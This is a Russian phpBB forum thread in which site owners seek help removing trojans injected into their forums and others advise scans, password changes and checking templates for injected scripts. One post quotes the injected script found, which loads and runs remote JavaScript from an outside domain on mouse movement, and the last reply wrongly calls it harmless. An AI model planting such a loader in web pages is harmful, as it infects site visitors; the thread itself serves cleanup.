Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

max755 писал(а):Уже и пароли на всё сменил, не помогает.
Пока вирус на компе, меняй пароли, не меняй - все одно.
ФТП доступ только у вас?
max755
phpBB 1.0.0
Сообщения: 9
Стаж: 14 лет 7 месяцев
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение max755 »

DK7 писал(а):ФТП доступ только у вас?
Надеюсь, что только у меня.
DK7 писал(а):Пока вирус на компе, меняй пароли, не меняй - все одно.
Сейчас провожу повторную проверку антивирусом.
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

Тут могут быть сотни нюансов. Вирус может быть где угодно, на флешке и постоянно инфицировать компьютер, а может быть сам хостер инфицирован.
Пользуйтесь простой штукой, которая однако очень помогает.
Когда будете сохранять пароль в программу для доступа к фтп, то вводите на 1 лишний символ в конце больше. При залогинивании , программа напишет что пароль неверен. И попросит заново ввести его. Бекспейсом забиваете последний символ и спокойно заходите. Червь же окажется в пролете.
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

max755 писал(а):Я уже проверял и Куреитом и Касперским, AVZ и HJT
Тогда ставь Аваст и после установки запланируй "Проверку во время загрузки"

Добавлено спустя 2 минуты 59 секунд:
max755 писал(а):HJT - ничего...
Выложи лог HJT
AntikMan
phpBB 1.4.0
Сообщения: 38
Стаж: 14 лет 2 месяца

Re: Как убить Трояна?

Сообщение AntikMan »

Помогите убрать Trojan Downloader.HackLoad.AG

У меня стоит еще 2.0.x версия форума. (не знаю, как уточнить, доступа в админку нет из-за активности антивиря, отключение его что-то не помогло)
Удалил подозрительную картинку картинку, выкачал с фтп все файлы и проверил НОДом, ничего не нашлось. Ифреймов подозрительных не видно.
Как обезвредить?
Спасибо

Код: Выделить всё

clubcaptiva.ru/forum/
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

AntikMan
на каких страницах ругается антивирь?
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
AntikMan
phpBB 1.4.0
Сообщения: 38
Стаж: 14 лет 2 месяца

Re: Как убить Трояна?

Сообщение AntikMan »

на всех, на форум не зайти
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

AntikMan
что у вас за антивирь? И еще сделайте на всякий случай скриншот его ругани, возможно это поможет разобраться, где засел гад.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Петрович
phpBB 2.0.0
Сообщения: 244
Стаж: 18 лет 5 месяцев
Откуда: НСО, п. Витаминка
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: Как убить Трояна?

Сообщение Петрович »

AntikMan, ведь тебе ответил в твоей предыдущей теме.
Какая точно стоит версия форума, какие моды установлены?
Вредоносный код обычно прописан в index.php, в файлах шаблона *.tpl (main.tpl). Код содержится в тегах <iframe>, <script>, иногда <script src=\...> в базе данных.
В папке с картинками возможно находятся shell'ы (файлы php), которые закодированы различными функциями. Смотреть и проверять нужно все.
Аватара пользователя
kusto
phpBB 1.4.0
Сообщения: 36
Стаж: 14 лет 1 месяц
Откуда: Киев

Re: Как убить Трояна?

Сообщение kusto »

ОТВЕТ:
- меняем ВСЕ пароли


http://virusinfo.info/pravila.html
пароли на что?
Последний раз редактировалось kusto 31.03.2011 14:33, всего редактировалось 1 раз.
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

kusto писал(а):пароли на что?
К базе и FTP.
Аватара пользователя
kusto
phpBB 1.4.0
Сообщения: 36
Стаж: 14 лет 1 месяц
Откуда: Киев

Re: Как убить Трояна?

Сообщение kusto »

наконец-то нашел.. по ходу такой вот код:

Код: Выделить всё

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
может кому интересно будет

всем сапсибо за содействие
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 19 лет 11 месяцев
Благодарил (а): 19 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение MAzZY »

Уверены?
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Re: Как убить Трояна?

Сообщение Alek$ »

MAzZY
вообще, довольно подозрительный код. Но не факт, что кроме него ничего нет.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Айдар
Former team member
Сообщения: 1687
Стаж: 14 лет 4 месяца
Откуда: KZN
Благодарил (а): 4 раза
Поблагодарили: 11 раз

Re: Как убить Трояна?

Сообщение Айдар »

Alek$, этот код ссылается на сайт гугла. Вряд ли Гугл распространяет вирусы...
In Web We Trust

Вернуться в «phpBB-пространство»